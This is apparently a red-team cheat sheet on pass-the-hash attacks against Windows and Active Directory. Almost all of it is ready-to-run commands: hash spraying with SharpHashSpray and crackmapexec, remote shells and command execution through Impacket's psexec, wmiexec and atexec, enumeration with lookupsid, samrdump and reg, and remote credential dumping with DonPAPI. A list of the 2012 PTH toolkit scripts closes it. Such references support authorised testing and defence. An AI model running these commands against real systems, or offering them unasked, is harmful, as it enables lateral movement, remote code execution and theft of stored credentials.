# Pass The Hash

## SharpHashSpray

An execute-assembly compatible tool for testing local administrator hashes across an Active Directory domain.

Usage example:

*`$ SharpHashSpray.exe Administrator <hash>`*

Resource: <https://github.com/RedCursorSecurityConsulting/SharpHashSpray>

## SMB

### Crackmapexec

```bash
crackmapexec smb <target IP> -u '<username>' -H '<hash>'
```

## Impacket

### Psexec

#### psexec.py

```bash
python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <username>@<target IP>
```

### WMI

#### wmiexec.py

```bash
python wmiexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <username>@<target IP>
```

### RPC

#### rpcdump.py

```bash
python rpcdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <username>@<target IP>
```

### Remote command execution

#### atexec.py

```bash
python atexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <username>@<target IP> whoami
```

#### Lookupsid.py

```bash
python lookupsid.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <domain>/<username>@<target IP>
```

#### Samrdump.py

```bash
python samrdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <domain>/<username>@<target IP>
```

#### reg.py

```bash
python reg.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <domain>/<username>@<target IP> -keyName <key>
```

## DonPAPI

DonPAPI dumps credentials from a remote machine (LSA, DPAPI, SAM, Wi-Fi, Vaults, Chrome secrets, Mozilla secrets, mRemoteNG secrets, VNC passwords and others).

Usage example:

```bash
$ DonPAPI.py --hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <domain>/<username>@<target IP>
```

Resource: <https://github.com/login-securite/DonPAPI>

## PTH Toolkit

In 2012, a set of pass-the-hash scripts was introduced at that year's BlackHat USA conference. They were available on Google Code Archive. Because of their ease of use and popularity, Kali Linux introduced them in its 2013 release. The following scripts were included in its pth-toolkit:

* **pth-curl**
* **pth-rpcclient**
* **pth-smbget**
* **pth-winexe**
* **pth-wmic**
* **pth-net**
* **pth-smbclient**
* **pth-sqsh**

